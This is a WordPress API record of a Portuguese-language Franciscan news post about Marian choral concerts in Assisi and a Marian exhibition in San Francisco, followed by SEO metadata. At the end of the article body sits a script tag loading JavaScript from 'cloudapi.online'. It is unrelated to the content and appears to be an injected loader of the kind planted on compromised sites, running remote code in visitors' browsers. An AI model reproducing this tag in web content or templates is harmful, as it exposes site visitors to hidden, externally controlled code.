{"id":17075,"date":"2012-05-04T08:26:18","date_gmt":"2012-05-04T11:26:18","guid":{"rendered":"http:\/\/new.franciscanos.org.br\/?p=17075"},"modified":"2019-09-24T09:59:54","modified_gmt":"2019-09-24T12:59:54","slug":"apresentacoes-musicais-em-assis-prestam-tributo-a-maria","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html","title":{"rendered":"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria"},"content":{"rendered":"<p><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2012\/05\/2161_040512.jpg\"><img loading=\"lazy\" class=\"alignright size-full wp-image-17076\" title=\"2161_040512\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2012\/05\/2161_040512.jpg\" alt=\"\" width=\"340\" height=\"423\" \/><\/a>Continua neste ano a experi\u00eancia iniciada em 2011 com a s\u00e9rie de apresenta\u00e7\u00f5es musicais denominadas \u201cEleva\u00e7\u00f5es Espirituais Marianas\u201d durante o m\u00eas de maio, dedicado a Nossa Senhora.<\/p>\n<p>A programa\u00e7\u00e3o oferece quatro apresenta\u00e7\u00f5es corais nos domingos do m\u00eas de maio, \u00e0s 15h30, na bas\u00edlica de Santa Maria dos Anjos, na Porci\u00fancula. A entrada \u00e9 franca.<\/p>\n<p>Participam forma\u00e7\u00f5es corais da Umbria e do L\u00e1cio. No dia 6 de maio, apresenta-se o Ensemble Libercantus, dirigido pelo maestro Vladimiro Vagnetti. No dia 13, o coro Laudesi Umbri, de Spoleto, dirigido pelo maestro Antonio Giannoni. Em 20 de maio, \u00e9 a vez do coro Citt\u00e0 di Bastia, dirigido pelo maestro Piero Caraba. E em 27 de maio apresenta-se o coro Vocalia Consort, de Roma, dirigido pelo maestro Marco Berrini.<\/p>\n<p><strong>Nova Porci\u00fancula de Assis em S\u00e3o Francisco<\/strong><\/p>\n<p>A Nova Porci\u00fancula de S\u00e3o Francisco, na Calif\u00f3rnia, inaugura uma exposi\u00e7\u00e3o dedicada \u00e0 Virgem Maria, organizada pelos Cavaleiros de S\u00e3o Francisco de Assis em parceria com a Obra da Porci\u00fancula. A mostra come\u00e7a hoje e vai at\u00e9 31 de outubro.<\/p>\n<p>Este santu\u00e1rio nacional de S\u00e3o Francisco de Assis e a sua capela dedicada a Maria, a Porci\u00fancula Nova, n\u00e3o apenas se situa no centro da cidade de S\u00e3o Francisco, perto da Chinatown e de North Beach, mas \u00e9 tamb\u00e9m, de acordo com seu site, \u201co cora\u00e7\u00e3o de S\u00e3o Francisco, onde, de modo real, o c\u00e9u e a terra se encontram como em nenhum outro lugar da cidade\u201d.<\/p>\n<p>Uma das raz\u00f5es da unicidade deste santu\u00e1rio \u00e9 a sua verdadeira localiza\u00e7\u00e3o urbana, na segunda cidade mais povoada dos Estados Unidos. No meio da mistura barulhenta e ca\u00f3tica, o santu\u00e1rio e a capela mariana oferecem um o\u00e1sis de paz, serenidade e al\u00edvio para o esp\u00edrito sedento.<\/p>\n<p>A exposi\u00e7\u00e3o mostra a Virgem Maria na arte e o seu papel na hist\u00f3ria da salva\u00e7\u00e3o, com particular destaque para o modo pr\u00f3prio como ela foi representada no Santu\u00e1rio da Porci\u00fancula. A bas\u00edlica de Santa Maria dos Anjos conserva testemunhos art\u00edsticos de indiscut\u00edvel valor, tanto no tocante \u00e0 hist\u00f3ria da iconografia mariana quanto \u00e0 pr\u00f3pria hist\u00f3ria da arte.<\/p>\n<p><strong>Para mais informa\u00e7\u00e3o:<\/strong> www.knightsofsaintfrancis.com<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>M\u00eas mariano<\/p>\n","protected":false},"author":1,"featured_media":211449,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[266,1249],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"M\u00eas mariano\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2012-05-04T11:26:18+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-09-24T12:59:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2012\/05\/2161_040512.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2012\/05\/2161_040512.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2012\/05\/2161_040512.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html\",\"name\":\"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#primaryimage\"},\"datePublished\":\"2012-05-04T11:26:18+00:00\",\"dateModified\":\"2019-09-24T12:59:54+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html","og_locale":"pt_BR","og_type":"article","og_title":"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria - Not\u00edcias - Franciscanos","og_description":"M\u00eas mariano","og_url":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2012-05-04T11:26:18+00:00","article_modified_time":"2019-09-24T12:59:54+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2012\/05\/2161_040512.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2012\/05\/2161_040512.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2012\/05\/2161_040512.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html","name":"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#primaryimage"},"datePublished":"2012-05-04T11:26:18+00:00","dateModified":"2019-09-24T12:59:54+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/apresentacoes-musicais-em-assis-prestam-tributo-a-maria.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Apresenta\u00e7\u00f5es musicais em Assis prestam tributo a Maria"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/17075"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=17075"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/17075\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/211449"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=17075"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=17075"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=17075"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}